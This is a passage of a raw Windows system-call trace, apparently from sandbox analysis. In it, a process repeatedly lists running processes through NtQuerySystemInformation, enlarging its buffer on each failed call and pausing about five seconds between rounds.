ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.807] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0214.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.955] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0214.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0215.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.106] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0215.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0215.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.256] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0215.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0215.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.587] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.589] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0215.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0215.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.749] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0215.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0215.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.911] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0215.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.021] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.137] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.245] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.403] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.406] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.526] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.640] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.643] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.749] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0216.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.859] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0216.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0216.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.039] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.156] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.398] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.399] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.403] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.520] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0217.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0217.663] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0217.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0217.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0217.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0217.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x1a0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0217.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, 